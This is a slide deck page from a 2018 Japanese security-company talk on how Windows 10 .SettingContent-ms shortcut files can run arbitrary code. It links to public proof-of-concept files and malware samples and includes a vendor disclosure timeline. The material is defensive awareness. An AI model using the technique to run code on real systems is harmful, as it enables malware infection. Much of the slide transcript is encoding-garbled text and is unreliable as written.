魔法の拡張子(.SettingContent-ms)

11fceeded5eeb213cdf686e3144962a6?s=47 ripjyr
June 29, 2018

 魔法の拡張子(.SettingContent-ms)

SettingContent-msを悪用した攻撃が実際に出ています。
この資料は、2018年06月29日にLAC社内会議で発表した資料になります。
既に、詳細は日本語になって公開されていますので、こちらでも公開します。

-Windows 10では拡張子「.SettingContent.ms」のファイルに任意のコードを書ける | スラド セキュリティ
-マクロを使わないでマルウェア感染を広める新しいテクニックが発見 | マイナビニュース

11fceeded5eeb213cdf686e3144962a6?s=128

ripjyr

June 29, 2018
Tweet

Transcript

  1. CYBERɹ-ɹEDUCATIONɹ-ɹPENTESTɹ-ɹJSOCɹ-ɹ 119ɹ-ɹCONSULTING We provide IT total solutions based on advanced

    security technologies. supports your B usiness LAC ೥݄೔ גࣜձࣾϥοΫ αΠόʔηΩϡϦςΟࣄۀ෦ ·ͬͪΌ͍ͩ;͘ ˜-"$$P -UE ຐ๏ͷ֦ுࢠ
  2. ˜-"$$P -UE Win10ͷʮઃఆʯ༻ͷ γϣʔτΧοτͰ೚ҙͷίʔυΛ࣮ߦՄೳ

  3. ˜-"$$P -UE ֦ுࢠɿ.SettingContent-ms

  4. ˜-"$$P -UE ݩʑͷ༻్͸ɺʮઃఆʯ߲໨ͷىಈ༻ WindowsεϚʔτνϡʔχϯά(337) Win 10TPฤ: γϣʔτΧοτϑΝΠϧͰʮઃఆʯͷWindows UpdateΛݺͼग़͢ | ϚΠφϏχϡʔε

    → https://news.mynavi.jp/article/windows-337/
  5. ˜-"$$P -UE ֦ுࢠ͕ফ͑ͨʂ

  6. ˜-"$$P -UE Githubʹcalc.exeΛىಈ͢ΔPoC͕ʂʂʂ test.SettingContent-ms · GitHub → https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8

  7. ˜-"$$P -UE ࣮ࡍ΍ͬͯΈΔ

  8. ˜-"$$P -UE Ұॠcmd.exe͕ಈ͍ͯɺcalc.exe͕ىಈ

  9. ˜-"$$P -UE μ΢ϯϩʔυϑΝΠϧ͸Πϯλʔωοτκʔϯ

  10. ˜-"$$P -UE ܯࠂͳ͘ɺcalc.exeىಈ

  11. ˜-"$$P -UE ɹɹ2/16/2018: Report sent MSRC ɹɹ2/16/2018: MSRC acknowledged the

    report, case number assigned ɹɹ3/2/2018: MSRC confirmed that they could reproduce the issue ɹɹ4/24/2018: Requested status update ɹɹ4/25/2018: MSRC informed me of a case handler change. An update ɹɹɹɹɹɹɹɹɹɹɹwas requested from the engineering team and would be relayed to me ɹɹɹɹɹɹɹɹɹɹɹASAP ɹɹ6/1/2018: Requested another update from MSRC ɹɹ6/4/2018: MSRC responded with a note that the severity of the issue is ɹɹɹɹɹɹɹɹɹɹbelow the bar for servicing and that the case will be closed. ɹɹ6/11/2018: Report published MS͸मਖ਼͢Δͭ΋Γ͸ແ͘࢓༷ͰΫϩʔζΒ͍͠ June | 2018 | enigma0x3 → https://enigma0x3.net/2018/06/
  12. ˜-"$$P -UE OLEʹຒΊࠐ·ΕͨΒ΍͹͍ʂ ɹɹɹɹˠ͓ͦΒ͘ϒϥοΫϦετʹೖΕͯ͘Δ Windows Settings Shortcuts Can Be Abused

    for Code Execution on Windows 10
 → https://www.bleepingcomputer.com/news/security/windows-settings-shortcuts-can-be-abused-for-code-execution-on-windows-10/
  13. ˜-"$$P -UE SettingContent-MS-File-Execution/LoadPowershellDemo.SettingContent-MS at master · bvoris/SettingContent-MS-File-Execution · GitHub →

    https://github.com/bvoris/SettingContent-MS-File-Execution/blob/master/LoadPowershellDemo.SettingContent-MS PowerShellΛಈ͔͢PoC΋ग़ͯ·͢ʢThanksੴ઒͞Μʣ ೥݄೔ߋ৽
  14. ˜-"$$P -UE <?xml version="1.0" encoding="UTF-8"?> <PCSettings> <SearchableContent xmlns - pastebin.com

    → https://pastebin.com/HaBb87Av mshta.exeΛ࢖͏PoC΋ग़ͯ·͢ʢ࢖͑Δ͔ෆ໌ʣ ೥݄೔ߋ৽ JUN 23RD, 2018
  15. ˜-"$$P -UE ͜ͷ֦ுࢠ͸Symantec Cloud͸ݕ஌ ೥݄೔ߋ৽ ೥݄೔৘ใ

  16. ˜-"$$P -UE Ϛϧ΢ΤΞʹѱ༻ʂʂʂʂʢThanksੴ઒͞Μʣ(1/2) ೥݄೔ߋ৽ VirusTotal → https://www.virustotal.com/ja/file/09666731EFAB134CB6C882902D64B5E22D664FCAA4B97211D8C66AAC966709A4/analysis/

  17. ˜-"$$P -UE VirusTotal → https://www.virustotal.com/#/file/51b06db04512d3e3c415b015be59a324c940e9538e47ff8ebfe340188bffbb84/detection μ΢ϯϩʔυ͞ΕΔɺLAW231.exe ͸ɺREMCOS RAT Β͍͠Ͱ͢ɻ Ϛϧ΢ΤΞʹѱ༻ʂʂʂʂʢThanksੴ઒͞Μʣ(2/2)

  18. CYBERɹ-ɹEDUCATIONɹ-ɹPENTESTɹ-ɹJSOCɹ-ɹ 119ɹ-ɹCONSULTING We provide IT total solutions based on advanced

    security technologies. supports your B usiness LAC Thank you. Any Questions ? ˜-"$$P -UE